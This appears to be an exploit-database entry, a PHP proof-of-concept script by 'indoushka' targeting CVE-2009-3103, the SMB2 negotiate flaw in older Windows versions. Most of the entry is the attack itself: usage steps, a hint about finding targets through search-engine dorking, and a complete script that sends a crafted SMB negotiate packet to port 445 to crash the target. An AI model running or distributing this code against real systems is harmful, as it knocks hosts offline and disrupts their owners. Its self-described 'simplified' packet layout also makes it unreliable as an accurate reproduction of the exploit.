## https://sploitus.com/exploit?id=PACKETSTORM:189595
=============================================================================================================================================
| # Title : Microsoft SRV2.SYS SMB v2 Denial of Service Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://Microsoft.com |
=============================================================================================================================================
POC :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] Code Description: This code is an exploit written in PHP that attempts to exploit a vulnerability in the SMB2 protocol found in Windows Vista, Windows 7, and Windows Server 2008.
The exploit relies on sending an SMB Negotiate request to the target with an invalid value in the Function Table which could result in a DoS or deeper exploitation of the vulnerability to obtain command execution.
( Related : https://packetstorm.news/files/id/180562/ Related CVE Numbers: CVE-2009-3103 )
[+] save code as poc.php.
[+] Set Target : line 58
[+] USage : php poc.php
[+] PayLoad :
<?php
class SMBExploit {
private $host;
private $port;
private $offset;
private $socket;
public function __construct($host, $port = 445, $offset = 0xffff) {
$this->host = $host;
$this->port = $port;
$this->offset = $offset;
}
public function connect() {
$this->socket = fsockopen($this->host, $this->port, $errno, $errstr, 5);
if (!$this->socket) {
die("Connection failed: $errstr ($errno)\n");
}
echo "Connected to {$this->host}:{$this->port}\n";
}
public function sendPayload() {
$dialects = [
"PC NETWORK PROGRAM 1.0", "LANMAN1.0", "Windows for Workgroups 3.1a",
"LM1.2X002", "LANMAN2.1", "NT LM 0.12", "SMB 2.002"
];
$data = "";
foreach ($dialects as $dialect) {
$data .= "\x02" . $dialect . "\x00";
}
$pkt = "\x00\x00\x00\x00"; // SMB header (simplified)
$pkt .= "\xFFSMB"; // SMB Signature
$pkt .= "\x72\x00\x00\x00\x18\x53\xC8"; // Negotiate Request
$pkt .= pack("v", $this->offset); // ProcessIDHigh
$pkt .= "\x00\x00\x00\x00"; // Extra fields
$pkt .= $data;
fwrite($this->socket, $pkt);
echo "Payload sent, waiting for response...\n";
$response = fread($this->socket, 1024);
if (!$response) {
echo "The target system has likely crashed.\n";
} else {
echo "Response received: " . bin2hex($response) . "\n";
}
}
public function disconnect() {
fclose($this->socket);
echo "Disconnected.\n";
}
}
$exploit = new SMBExploit("192.168.1.1");
$exploit->connect();
$exploit->sendPayload();
$exploit->disconnect();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================